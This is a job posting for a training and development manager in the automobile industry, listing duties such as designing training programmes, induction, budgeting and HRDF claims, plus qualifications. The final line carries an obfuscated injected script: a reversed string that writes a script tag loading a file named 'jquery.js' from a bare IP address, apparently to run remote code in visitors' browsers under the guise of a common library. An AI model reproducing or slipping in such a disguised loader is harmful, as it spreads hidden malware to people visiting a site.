Industry : Automobile
– Identify training needs by evaluating strengths and weaknesses, formulates recommendations, and develops training materials.
– Analyze training needs to develop new training programs or modify and improve existing programs.
– Develop and organize training manuals, multimedia visual aids, classroom handout, and other instructional or educational materials.
– Plan, develop, and provide training and employees’ development programs, using knowledge of the effectiveness of methods such as classroom training, demonstrations, on-the-job training, meetings, conferences, and workshops.
– Work closely with the Talent Management Manager to translate requirements into trainings that will groom employees for the next step of their career path.
– Design the implementation of targeted high potential and leadership development initiatives.
– Build annual training program and prepare teaching plans.
– Direct structured learning experiences and monitor their quality results.
– Developing effective induction programs – acclimate new hires to the business and conduct orientation sessions.
Assess training effectiveness to ensure incorporation of taught skills and techniques into
employees’ work behavior.
– Periodically evaluate ongoing programs to ensure that they reflect any changes.
– Stay abreast of the new trends and tools in employee development.
– Considering the costs of planned programs and keeping within budgets as assessing the return on investment of any training or development programs.
– Devising individual learning plans.
– Producing training materials for in-house courses.
– Managing the delivery of training and development programs and devising a training strategy for the organization.
– Monitoring and reviewing the progress of trainees through questionnaires and discussions with managers;
– Ensuring that statutory training requirements are met.
– Amending and revising programs as necessary, in order to adapt to changes occurring in the work environment.
– Helping line managers and trainers to solve specific training problems, either on a one-to-one basis or in groups.
– Keeping up to date with developments in training by reading relevant journals, going to meetings and attending relevant courses.
– Attending to all HRDF related matters (application, claim and any matters arising).
– Bachelor’s Degree in Business Administration, Human Resources, Learning/Organizational Development or any related field.
– Minimum of 3 – 5 years’ of related experience in Managerial capacity.
– Possess exposure in the Performance Management System management.
– Project management, organizational and analytic skills in order to manage multiple processes and initiatives simultaneously is required.
– Must be organized and detail-oriented.
– Collaborative with proven ability to build rapport at all levels of the organization and leverage networks.
– Excellent oral and written communications skills.
– Possess strong presentation skills.
– Ability to diplomatically prepare, coach, and provide feedback to managers and employees.
– Able to work effectively in a high volume, fast-paced environment.
– Able to exercise sound judgment and independent decision-making.
– Able to establish strong customer relationships and influence others.
– Able to work well independently, but must also be able to work as part of a team.
– Superior organizational skills as well as ability to prioritize and meet deadlines. document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))